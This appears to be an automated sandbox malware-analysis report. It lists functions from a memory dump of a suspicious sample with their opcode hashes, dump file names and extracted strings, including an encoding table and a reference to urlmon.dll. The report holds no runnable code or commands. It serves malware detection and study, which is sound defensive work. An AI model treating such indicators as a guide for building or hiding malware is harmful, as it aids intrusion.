Opcode Fuzzy Hash: 8d39e4e5c5fe3078fa588d5823e175152e60adf4166d1dbe10866e8505dd36bc
Instruction Fuzzy Hash: F311EFBAD1121DAF8B40DFE9D9419EEBBF9EF48200F14416EE919F7200E7705A05CBA1

Function 037FF950 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 193cfef482800df3b4dc39ddbeb6d8212c0e74db40a986dc8767e5a1b9a782f2
Instruction ID: 534aa485ff63e36e7d00f17022781d4998c3593b3f9d38bc45cdc64445648bc8
Opcode Fuzzy Hash: 193cfef482800df3b4dc39ddbeb6d8212c0e74db40a986dc8767e5a1b9a782f2
Instruction Fuzzy Hash: 8B11ECB6D0121DAF8B40DFE9D8419EFB7F9FF48210F14856AE919E7200E7705A04CBA1

Function 037FAFD0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adfa33c6184323b4a07e85ec05aecc7e414adf4152752c199f52150017e95aba
Instruction ID: 30926d4add84a580cd37bff2ecdd7f864b444f02830b6bf9e110cae0f06ef3cf
Opcode Fuzzy Hash: adfa33c6184323b4a07e85ec05aecc7e414adf4152752c199f52150017e95aba
Instruction Fuzzy Hash: 9F0196BEA403146BD750EAD9EC49DEF736CDF45210F000695FE14DB281FAB0AE514AE2

Function 03802FF0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e92eec6635c9a7362fc0b7b93e92d48783c6160e28d7ead9ea2c0a8e53e63b
Instruction ID: 51e74bc7ad7275428b4cf80a50b341a32b99663b2cd514a7a33d548b79f4d655
Opcode Fuzzy Hash: 77e92eec6635c9a7362fc0b7b93e92d48783c6160e28d7ead9ea2c0a8e53e63b
Instruction Fuzzy Hash: 9A0192B6214208BBCB44DE99DC81EDB77ADAF8D714F508608FA09E7240D630FC51CBA4

Function 037FEC70 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb2e14c9605e3b1a57993574b6b8fdbe7dd2d296afa8fd364e31d28eceb2932
Instruction ID: 9bdc69bed1766ca13d517f01c594f64dd9863ca5a4da35007c95f0fa3699125e
Opcode Fuzzy Hash: 6fb2e14c9605e3b1a57993574b6b8fdbe7dd2d296afa8fd364e31d28eceb2932
Instruction Fuzzy Hash: BE01D7B6C0121CAF8B40DFE8D9449EEBBF9BB08200F14426EE919F6200F7705A048FA5

Function 037DD75E Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56e7d7e008ccc7a575333cb69efecfaaa9eb0e5c24845473d587f9abf84afc5
Instruction ID: a512b51f3152bc29914bad7fc303d779018f5df7f8290e5e85ecf2b7f6b1603a
Opcode Fuzzy Hash: e56e7d7e008ccc7a575333cb69efecfaaa9eb0e5c24845473d587f9abf84afc5
Instruction Fuzzy Hash: 0401C9B5C212289E8B50CFA9D4844DEBBF8FB08620B10455BE818E7200D37146418F94

Function 037DD8B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a39190146e956cf2d1aa155237cb3af6424f70138687eac5f1b67b656b1b8dec
Instruction ID: 4d985805ae16e9e01ba3010bb6485ac77f90660e22d1af7f8de7f38a99dffb56
Opcode Fuzzy Hash: a39190146e956cf2d1aa155237cb3af6424f70138687eac5f1b67b656b1b8dec
Instruction Fuzzy Hash: 89F02777A003066BD7209A5DFC40B86F7ACEF84234F240222F91DCB292E632E41183E0

Function 03802220 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaab913ae3bf71d9846ca62ed234e94d2d90fdba1d465bf5fa36fd05b1c2109d
Instruction ID: ed396ba562e872d90906b9c4efa7db495f460c8ad4011b23d4bb11f839a03ce9
Opcode Fuzzy Hash: aaab913ae3bf71d9846ca62ed234e94d2d90fdba1d465bf5fa36fd05b1c2109d
Instruction Fuzzy Hash: 08F01C79200209BBCB10DF99DC41EAB77ADEFC9650F004419F918A7240D670B9518BB5

Function 037DD8A4 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd902fb7ba5d9d2949db0dd25d4b52a3c2b343b62ffe933653eb2dea646988c
Instruction ID: 60334115ea2bc9ed0d05964c0be2fb8d04d5ea174ad8a1af72ccfce363bed8b6
Opcode Fuzzy Hash: 2cd902fb7ba5d9d2949db0dd25d4b52a3c2b343b62ffe933653eb2dea646988c
Instruction Fuzzy Hash: C3E06837804226678720996EAC488C2F7ECEF8A2B07100721E46A97222E532940186D1

Function 037F1990 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a93b8f90239fdc7c18a3392d360d5aabc1e6abd6bab1588149afe3fa9aad575
Instruction ID: 4cbaf6b21cbfa9492c0c2c402b8c1d154756d2e2369493b3f251e19b5c18fff9
Opcode Fuzzy Hash: 1a93b8f90239fdc7c18a3392d360d5aabc1e6abd6bab1588149afe3fa9aad575
Instruction Fuzzy Hash: 78F0A771C1520DEBDB14DFA4D841BDEBBB8EB44320F1047AEE965DB2C0E63597548B81

Function 03802F10 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42f8c2c7972597a9eea4f72867f0c54a7aa421d8e554d6c8e8f46347cab59c
Instruction ID: e2108de8ce2c4083565dd6d75b17b3ab2b30f8d86525e2e89629e80a3fd6fe68
Opcode Fuzzy Hash: 2a42f8c2c7972597a9eea4f72867f0c54a7aa421d8e554d6c8e8f46347cab59c
Instruction Fuzzy Hash: B3E0E57A2003187BDA14EE99DC45FAB77ADEF89710F004959F909AB281D670B9108AB5

Function 03804D80 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a79cc1be080427257681e9960dc20d588df1f90d0f575c0f739668790d52d52
Instruction ID: d74c1ef0f7cdf04802927fc2d2ee30cd4573caecedfb294a939c8934fe2bf8a3
Opcode Fuzzy Hash: 2a79cc1be080427257681e9960dc20d588df1f90d0f575c0f739668790d52d52
Instruction Fuzzy Hash: A6E04F36A8021467C261E5CA9C05FA7B79CCBC1A60F0A00A8FF18DB281E560A90046E6

Function 03802BE0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3abc973a75475fabfc7bb3d636dbc602c79d53bb3a703b95ff2466499fa64ebb
Instruction ID: eeb9e5344db71cbb0c35bb7bb2cc32ad592c69040c460c462504ea1728cfde4b
Opcode Fuzzy Hash: 3abc973a75475fabfc7bb3d636dbc602c79d53bb3a703b95ff2466499fa64ebb
Instruction Fuzzy Hash: CDE08C3A200314BBC620EBA9DC01F9B77ADEFC6710F008419FA0CAB281C6B4B91187F1

Function 037F198E Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb454a07bebcc38a4aca032bda60b20208183ba058a5c4c75eba782f01d623a2
Instruction ID: 7130b4467d65b4571e91a6c284ff53fd8d3784d9aa22eb37656cc3d593f13ee3
Opcode Fuzzy Hash: cb454a07bebcc38a4aca032bda60b20208183ba058a5c4c75eba782f01d623a2
Instruction Fuzzy Hash: 9AE09275C15108EBDB08CFA4E941BADB7B9EB44310F1443AEFD19DB280E23597548B81

Non-executed Functions

Function 037ED79C Relevance: 51.4, Strings: 41, Instructions: 168COMMON

Download Yara Rule

Strings

@@@@, xrefs: 037ED951
@@@@, xrefs: 037ED9C8
@@@@, xrefs: 037ED997
@@@@, xrefs: 037ED9BA
@@@@, xrefs: 037ED927
@@@@, xrefs: 037ED9C1
!"#$, xrefs: 037ED8B3
@@@@, xrefs: 037ED943
@@@@, xrefs: 037ED93C
@@@@@@@@, xrefs: 037ED9DF
@@@@, xrefs: 037ED974
123@, xrefs: 037ED8DB
@@@@, xrefs: 037ED912
-./0, xrefs: 037ED8D1
@@@@, xrefs: 037ED92E
@@@@, xrefs: 037ED989
)*+,, xrefs: 037ED8C7
@@@@, xrefs: 037ED9A5
@@@@, xrefs: 037ED9B3
@@@@, xrefs: 037ED8FD
@@@@, xrefs: 037ED99E
@@@@, xrefs: 037ED966
@@@@, xrefs: 037ED920
@@@@, xrefs: 037ED94A
@@@@, xrefs: 037ED904
@@@@, xrefs: 037ED8EF
@@@@, xrefs: 037ED919
%&'(, xrefs: 037ED8BD
@@@@, xrefs: 037ED96D
@@@@, xrefs: 037ED895
@@@@, xrefs: 037ED982
@@@@, xrefs: 037ED9AC
@@@@, xrefs: 037ED90B
@@@@, xrefs: 037ED8F6
@@@@, xrefs: 037ED990
@@@@, xrefs: 037ED95F
@@@@, xrefs: 037ED958
@@@@, xrefs: 037ED935
@@@@, xrefs: 037ED97B
@@@@, xrefs: 037ED8E5
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@, xrefs: 037EDA13

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
API String ID: 0-3248090998
Opcode ID: dca47b2d192eacc748ff7a3467a3d2956cb15524d1ff5892db028f84a6cee5f2
Instruction ID: 681bcec7ec603ffc0ebd15af2266c2453bb39340dbf50ed494e23f65333eda6f
Opcode Fuzzy Hash: dca47b2d192eacc748ff7a3467a3d2956cb15524d1ff5892db028f84a6cee5f2
Instruction Fuzzy Hash: 2291F1F08052998ECB218F55A5603DFBF71BB95204F1581E9C6A97B243C3BE4E45DF90

Function 037ED7A0 Relevance: 51.4, Strings: 41, Instructions: 166COMMON

Download Yara Rule

Strings

@@@@, xrefs: 037ED951
@@@@, xrefs: 037ED9C8
@@@@, xrefs: 037ED997
@@@@, xrefs: 037ED9BA
@@@@, xrefs: 037ED927
@@@@, xrefs: 037ED9C1
!"#$, xrefs: 037ED8B3
@@@@, xrefs: 037ED943
@@@@, xrefs: 037ED93C
@@@@@@@@, xrefs: 037ED9DF
@@@@, xrefs: 037ED974
123@, xrefs: 037ED8DB
@@@@, xrefs: 037ED912
-./0, xrefs: 037ED8D1
@@@@, xrefs: 037ED92E
@@@@, xrefs: 037ED989
)*+,, xrefs: 037ED8C7
@@@@, xrefs: 037ED9A5
@@@@, xrefs: 037ED9B3
@@@@, xrefs: 037ED8FD
@@@@, xrefs: 037ED99E
@@@@, xrefs: 037ED966
@@@@, xrefs: 037ED920
@@@@, xrefs: 037ED94A
@@@@, xrefs: 037ED904
@@@@, xrefs: 037ED8EF
@@@@, xrefs: 037ED919
%&'(, xrefs: 037ED8BD
@@@@, xrefs: 037ED96D
@@@@, xrefs: 037ED895
@@@@, xrefs: 037ED982
@@@@, xrefs: 037ED9AC
@@@@, xrefs: 037ED90B
@@@@, xrefs: 037ED8F6
@@@@, xrefs: 037ED990
@@@@, xrefs: 037ED95F
@@@@, xrefs: 037ED958
@@@@, xrefs: 037ED935
@@@@, xrefs: 037ED97B
@@@@, xrefs: 037ED8E5
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@, xrefs: 037EDA13

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
API String ID: 0-3248090998
Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
Instruction ID: 4881060998c3e53e934552b2a06e8ea98286b02af9cbfd2429bdda7d5d09fc2c
Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
Instruction Fuzzy Hash: 2591F1F08052998ECB218F59A5603DFBF71BB95204F1581E9C6AA7B243C3BE4E45DF90

Function 037E3EEF Relevance: 38.9, Strings: 31, Instructions: 136COMMON

Download Yara Rule

Strings

r#, xrefs: 037E3F85
", xrefs: 037E42FE
N`, xrefs: 037E40C9
Pl, xrefs: 037E3F42
F2, xrefs: 037E3FA3
6, xrefs: 037E40EE
<B, xrefs: 037E404B
9, xrefs: 037E4212
>, xrefs: 037E42A0
f, xrefs: 037E423A
5, xrefs: 037E4226
, xrefs: 037E40AB
B!, xrefs: 037E3FAD
:, xrefs: 037E428C
., xrefs: 037E4083
l<, xrefs: 037E3FC5
<, xrefs: 037E40DA
G, xrefs: 037E42EA
<d, xrefs: 037E417B
w, xrefs: 037E42D6
I, xrefs: 037E41B1
*, xrefs: 037E41C5
y, xrefs: 037E402B
N, xrefs: 037E41E3
<, xrefs: 037E425A
h, xrefs: 037E41D9
Py, xrefs: 037E3F99
+, xrefs: 037E406F
yQ, xrefs: 037E3FCC
q, xrefs: 037E3F26
t, xrefs: 037E4003

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $"$*$+$.$5$6$9$:$<$<$<B$<d$>$B!$F2$G$I$N$N`$Pl$Py$f$h$l<$q$r#$t$w$y$yQ
API String ID: 0-2780294122
Opcode ID: 18d129bc33351823671608d4d843f9514494d30e359d1a65370bcb022345da23
Instruction ID: fe03d223087bfcb2f9fce58a17c949c14bc66a793e147c9051665c996a98daba
Opcode Fuzzy Hash: 18d129bc33351823671608d4d843f9514494d30e359d1a65370bcb022345da23
Instruction Fuzzy Hash: 6BA116B0C05669CBEB61CF45C9987DEBAB1BB05308F1081D9C14C7B290CBBA1AC9CF95

Function 037FC230 Relevance: 34.0, Strings: 27, Instructions: 264COMMON

Download Yara Rule

Strings

5, xrefs: 037FC2DC
), xrefs: 037FC278
u, xrefs: 037FC2AA
E, xrefs: 037FC2F1
}, xrefs: 037FC2B4
B, xrefs: 037FC345
m, xrefs: 037FC2E3
v, xrefs: 037FC264
s, xrefs: 037FC2BE
h, xrefs: 037FC25A
%, xrefs: 037FC416
urlmon.dll, xrefs: 037FC472, 037FC475
i, xrefs: 037FC4D2
g, xrefs: 037FC2A0
Q, xrefs: 037FC306
F, xrefs: 037FC2F8
}, xrefs: 037FC296
H, xrefs: 037FC2FF
$, xrefs: 037FC28C
F, xrefs: 037FC30D
), xrefs: 037FC2D2
T, xrefs: 037FC31B
J, xrefs: 037FC34C
w, xrefs: 037FC2EA
>, xrefs: 037FC26E
$, xrefs: 037FC2C8
., xrefs: 037FC4CB

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
API String ID: 0-1002149817
Opcode ID: 04799db78a0a8415bfeea5af3c5c82d1375a7aa249767a4800bd4721c4c15155
Instruction ID: c2478307054d132b2d2f683901293f173b7ef89249a0412b49b77677dae55b2a
Opcode Fuzzy Hash: 04799db78a0a8415bfeea5af3c5c82d1375a7aa249767a4800bd4721c4c15155
Instruction Fuzzy Hash: C1C120B5D103289EDB61DFA5DC44BEEBBB9AF05304F0081D9D60CAB241D7B55A88CFA1

Function 037F90C0 Relevance: 25.2, Strings: 20, Instructions: 250COMMON

Download Yara Rule

Strings

I, xrefs: 037F918B
\, xrefs: 037F91B5
e, xrefs: 037F9161
I, xrefs: 037F9146
r, xrefs: 037F9184
m, xrefs: 037F91AE
, xrefs: 037F9168
r, xrefs: 037F915A
t, xrefs: 037F9192
r, xrefs: 037F917D
i, xrefs: 037F91A0
l, xrefs: 037F9176
g, xrefs: 037F91CA
2, xrefs: 037F91D1
t, xrefs: 037F9150
x, xrefs: 037F916F
r, xrefs: 037F91C3
l, xrefs: 037F9199
t, xrefs: 037F91BC
o, xrefs: 037F91A7

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
API String ID: 0-3236418099
Opcode ID: 44c8065f01eff63c7b8adbc0b58da6653285710fa2c4be746a4f946b6dd3ceea
Instruction ID: 8670a3817e8293d3669aeebd9e6ad1750504b9dda8e4c802b6890340253bd977
Opcode Fuzzy Hash: 44c8065f01eff63c7b8adbc0b58da6653285710fa2c4be746a4f946b6dd3ceea
Instruction Fuzzy Hash: FE917EB5900318AEEB20EF959C44FEEB7BCEF45304F4441D9E608AB140E7B55B898FA1

Function 037F4860 Relevance: 16.4, Strings: 13, Instructions: 194COMMON

Download Yara Rule

Strings

x, xrefs: 037F489B
r, xrefs: 037F48F9
o, xrefs: 037F48CF
F, xrefs: 037F4907
s, xrefs: 037F4915
m, xrefs: 037F4900
., xrefs: 037F4891
o, xrefs: 037F48F2
P, xrefs: 037F48EB
, xrefs: 037F48BA
l, xrefs: 037F490E
i, xrefs: 037F48C1
e, xrefs: 037F48C8

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: 7a581a856c3519104a893eacf13f68de0e9ac6f8671b84d005a0ac6ced54c49b
Instruction ID: fbe84777b7cdf7a4fc7f69377703f839df2c9df364f4c788dd790ece5994f94e
Opcode Fuzzy Hash: 7a581a856c3519104a893eacf13f68de0e9ac6f8671b84d005a0ac6ced54c49b
Instruction Fuzzy Hash: D67140B5C11318ABDB61DF95DC85FDEB7BCAF48704F008599E608AB180EB7067488FA5

Function 037DD3E6 Relevance: 15.1, Strings: 12, Instructions: 72COMMON

Download Yara Rule

Strings

YE@J, xrefs: 037DD496
H]@F, xrefs: 037DD418
]LQ], xrefs: 037DD3FC
H]@F, xrefs: 037DD49D
AHGN, xrefs: 037DD4B9
), xrefs: 037DD4E0
YE@J, xrefs: 037DD411
@JH], xrefs: 037DD43B
NGLM, xrefs: 037DD4AB
HYYE, xrefs: 037DD434
^LKY, xrefs: 037DD465
YS^K, xrefs: 037DD3D0, 037DD3D9

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: )$@JH]$AHGN$HYYE$H]@F$H]@F$NGLM$YE@J$YE@J$YS^K$]LQ]$^LKY
API String ID: 0-2526426664
Opcode ID: a18015bc3949c100c11fb8b25ebda7db19cea98074dfa43f6bc19524e8a2876f
Instruction ID: 641a3cc893cfee2d40b327319aa570d6e08583e8940acdc7e8451c611ff9bef0
Opcode Fuzzy Hash: a18015bc3949c100c11fb8b25ebda7db19cea98074dfa43f6bc19524e8a2876f
Instruction Fuzzy Hash: 9E3112B0C01268EBCF20CFD9D9451EDBFB4BB06308F218559D5296F201D7355A52CF92

Function 037F4857 Relevance: 13.9, Strings: 11, Instructions: 162COMMON

Download Yara Rule

Strings

m, xrefs: 037F4900
r, xrefs: 037F48F9
o, xrefs: 037F48CF
o, xrefs: 037F48F2
F, xrefs: 037F4907
P, xrefs: 037F48EB
, xrefs: 037F48BA
l, xrefs: 037F490E
s, xrefs: 037F4915
i, xrefs: 037F48C1
e, xrefs: 037F48C8

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $F$P$e$i$l$m$o$o$r$s
API String ID: 0-3436599080
Opcode ID: 21219386a74dacdf0ecb2fa5db56ef6c233c51bffee998f6587fd25745e6c49d
Instruction ID: 1a466b790c3673ec24c27a86fc93f4671ef8f63fd9d317126c1d079fa7621405
Opcode Fuzzy Hash: 21219386a74dacdf0ecb2fa5db56ef6c233c51bffee998f6587fd25745e6c49d
Instruction Fuzzy Hash: 2C513EB5C11318ABDB51DB94CC85FDEB7BDAF48704F008599E608AB180EB7067488FA1

Function 037E8550 Relevance: 13.8, Strings: 11, Instructions: 84COMMON

Download Yara Rule

Strings

\, xrefs: 037E857D
n, xrefs: 037E85E4
D, xrefs: 037E85D6
r, xrefs: 037E8599
e, xrefs: 037E85A0
l, xrefs: 037E858B
i, xrefs: 037E85EB
x, xrefs: 037E8584
r, xrefs: 037E8592
e, xrefs: 037E85A7
w, xrefs: 037E85DD

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: 048e6ee9fe0fc974175b0b8f4bf540988f999917143f1f0d0c7c29c898425327
Instruction ID: 30fa9ff549ce00da489fae3f9d3563d54ffc555e36a341f022e0072ee52c67c9
Opcode Fuzzy Hash: 048e6ee9fe0fc974175b0b8f4bf540988f999917143f1f0d0c7c29c898425327
Instruction Fuzzy Hash: 0B218DB5D50318AAEF50DFE4DC44BEEBBB9BB08704F00815DE608BA180DBB556488BA5

Function 037E8547 Relevance: 13.8, Strings: 11, Instructions: 81COMMON

Download Yara Rule

Strings

\, xrefs: 037E857D
n, xrefs: 037E85E4
D, xrefs: 037E85D6
r, xrefs: 037E8599
e, xrefs: 037E85A0
l, xrefs: 037E858B
i, xrefs: 037E85EB
x, xrefs: 037E8584
r, xrefs: 037E8592
e, xrefs: 037E85A7
w, xrefs: 037E85DD

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: 8935263068eea650764eef8606ce688fa77f99795620b18d08c1fb1237726c3e
Instruction ID: c2a937938706b8c7303e1b2771d886e8ea7d85ceaab8e15aee1a1f85ee94016b
Opcode Fuzzy Hash: 8935263068eea650764eef8606ce688fa77f99795620b18d08c1fb1237726c3e
Instruction Fuzzy Hash: 1A31A0B5C40318AEEF50DFA4DC44BEEBBB9BF48304F14818DE614BA180DBB55648CBA5

Function 037DD3F0 Relevance: 13.8, Strings: 11, Instructions: 53COMMON

Download Yara Rule

Strings

YE@J, xrefs: 037DD496
H]@F, xrefs: 037DD418
]LQ], xrefs: 037DD3FC
H]@F, xrefs: 037DD49D
AHGN, xrefs: 037DD4B9
), xrefs: 037DD4E0
YE@J, xrefs: 037DD411
@JH], xrefs: 037DD43B
NGLM, xrefs: 037DD4AB
HYYE, xrefs: 037DD434
^LKY, xrefs: 037DD465

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: )$@JH]$AHGN$HYYE$H]@F$H]@F$NGLM$YE@J$YE@J$]LQ]$^LKY
API String ID: 0-1068407424
Opcode ID: 3509fec1f0cce35ec1e274312fe3cd14c2bfe4f97c41046805d4bcd8fd425162
Instruction ID: ea0b8c556530d36844190ac72dc812d532050cca0ca14b6527c25a133e07b479
Opcode Fuzzy Hash: 3509fec1f0cce35ec1e274312fe3cd14c2bfe4f97c41046805d4bcd8fd425162
Instruction Fuzzy Hash: A321BDB0C0126CDACF21CFD99A841EDBFB0BB06318F228159D5297F202D7355956DF95

Function 037F9590 Relevance: 12.8, Strings: 10, Instructions: 342COMMON

Download Yara Rule

Strings

:, xrefs: 037F9639
m, xrefs: 037F9632
P, xrefs: 037F9612
:, xrefs: 037F95F2
I, xrefs: 037F95EB
N, xrefs: 037F962B
t, xrefs: 037F9604
:, xrefs: 037F9620
A, xrefs: 037F95FD
s, xrefs: 037F9619

Memory Dump Source

